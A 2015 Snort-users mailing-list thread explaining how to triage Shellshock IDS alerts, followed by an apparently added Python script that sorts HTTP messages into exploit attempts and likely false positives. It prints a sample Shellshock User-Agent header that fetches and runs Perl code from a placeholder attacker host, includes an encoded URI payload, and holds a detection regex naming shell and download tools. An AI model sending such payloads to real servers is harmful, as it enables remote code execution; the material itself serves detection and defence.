[Snort-users] ShellShock Signatures

s0ups . ynots0ups at ...11827...
Tue Mar 3 11:37:54 EST 2015


On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards at ...11827...>
wrote:

> Hello Snort Users,
>
> I'm a new list member, and happy to say that I've been working with
> Firesight and a couple of ASA-X Firepower modules for almost a week now.
> This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> this message from this list while researching an alert:
> http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a user
> viewing a newspaper's website today, and I received an alert for 1:31977.
> I actually wasn't familiar with the domain name, and just searching for the
> domain I saw in the alert in Google also generated an alert from my
> workstation (I assume something to do with Google pulling news/images to
> display in the results?).  The URI from the request does have "() {" in it,
> so that's why it was triggered, but I don't know if it's a False Positive
> alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> provide more detail from the pcap / URI when I'm back in the office
> tomorrow.
>
>
> While I'm introducing myself as a snort newbie...If anyone has any
> recommendations for other resources or reading material, feel free to
> message me off-list.
>
> Cheers,
> Colin Edwards
> CISSP, GCIH, GCWN, GSEC, MCSE
>
>
Yo Colin,

As you probably know, Shellshock attacks attempt to exploit environment
variables that use user-provided data. The attacks are pretty easy to
identify as they usually have some recognizable commands after the "() {
:;};". I've actually hardly, if ever, seen 1:31977 in my environment as the
majority of the legit hits I see target HTTP header fields (so 1:31978 is
more common) like so:
    GET /cgi-bin/possiblevulnerablescript.cgi
    User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://attackerwebsite/maliciousperlcode;perl maliciousperlcode"

Fireeye has a good explanation and illustration of the various attack
methods seen for the Shellshock vulnerability which will give you a good
idea on what the common attacks look like. (
https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html
)

Chances are if it's an HTTP response from an external webserver to a client
browser then it's a FP and poses little to no threat. I'd be interested in
checking out the URI if you want to send it to me.

- s0ups
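The triage the reply describes, written out as an added example (this is not code from the list post or from Snort, and it does not reproduce the content matches of rules 1:31977 or 1:31978). It splits a raw HTTP message into start line, headers and body, URL-decodes the request URI the way an HTTP normalizer would before matching, and then applies the distinction above: "() {" followed by a command in a request header or URI is an exploit attempt, the bare marker in a request is flagged for review, and the marker inside a server response is treated as a likely false positive because it cannot reach a CGI environment variable on the server that sent it. The sample messages, hostnames and the command list in PAYLOAD_RE are constructed for the example.

```python
"""Triage HTTP messages for Shellshock-style "() {" markers (added example)."""
import re
from urllib.parse import unquote

# The marker every Shellshock payload needs: an empty function definition.
MARKER_RE = re.compile(r"\(\)\s*\{")
# Marker, closing brace, then something command-like. The command list is an
# assumption for this example, not the content list of any Snort rule.
PAYLOAD_RE = re.compile(
    r"\(\)\s*\{[^}]*\}\s*;\s*"
    r"(?:/bin/(?:ba)?sh|/usr/bin/\S+|wget|curl|perl|python|php|nc|echo|cat|id)\b",
    re.IGNORECASE,
)


def parse_http(raw: str):
    """Split a raw HTTP message into (start line, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify(raw: str):
    """Return (verdict, hits); verdict is one of
    exploit-attempt, suspicious, review, likely-fp, clean."""
    start, headers, body = parse_http(raw)
    hits = []
    if start.startswith("HTTP/"):
        # Server -> client: the marker here is content, not an env var on a target.
        for name, value in headers.items():
            if MARKER_RE.search(value):
                hits.append(("response-header", name))
        if MARKER_RE.search(body):
            hits.append(("response-body", ""))
        return ("likely-fp" if hits else "clean"), hits

    # Client -> server: headers are what CGI copies into HTTP_* environment vars.
    parts = start.split(" ")
    uri = unquote(parts[1]) if len(parts) > 1 else ""   # decode %28%29%20%7B etc.
    for name, value in headers.items():
        if PAYLOAD_RE.search(value):
            return "exploit-attempt", [("header", name)]
        if MARKER_RE.search(value):
            hits.append(("header-marker", name))
    if PAYLOAD_RE.search(uri):
        return "exploit-attempt", [("uri", uri)]
    if MARKER_RE.search(uri):
        hits.append(("uri-marker", uri))
    if any(kind == "header-marker" for kind, _ in hits):
        return "suspicious", hits
    return ("review" if hits else "clean"), hits


# Constructed sample traffic (not captured from any real site).
SAMPLES = {
    "header_exploit": (
        "GET /cgi-bin/possiblevulnerablescript.cgi HTTP/1.1\r\nHost: victim.example\r\n"
        'User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget '
        'http://attackerwebsite/maliciousperlcode;perl maliciousperlcode"\r\n\r\n'
    ),
    "uri_exploit": (
        "GET /cgi-bin/status?%28%29%20%7B%20%3A%3B%7D%3B%20/usr/bin/id HTTP/1.1\r\n"
        "Host: victim.example\r\n\r\n"
    ),
    "uri_marker_only": (  # a JS callback in a query string, no command after the brace
        "GET /widget.js?cb=function%28%29%20%7B%20return%201%3B%20%7D HTTP/1.1\r\n"
        "Host: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
    ),
    "referer_marker": (
        "GET /page HTTP/1.1\r\nHost: www.example.com\r\n"
        "Referer: http://www.example.com/?cb=function() { }\r\n\r\n"
    ),
    "response_fp": (
        "HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n\r\n"
        "window.onload = function() { init(); };\r\n"
    ),
    "clean": "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
}


def triage_all(samples=SAMPLES):
    """Map each sample name to its verdict."""
    return {name: classify(raw)[0] for name, raw in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage_all().items():
        print(f"{name:16s} -> {verdict}")
```

The decode step matters in practice: a marker in the URI arrives percent-encoded, so matching the raw request line would miss it, which is also why the URI-based alert fires on harmless query strings that merely contain a decoded "function() {" fragment.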
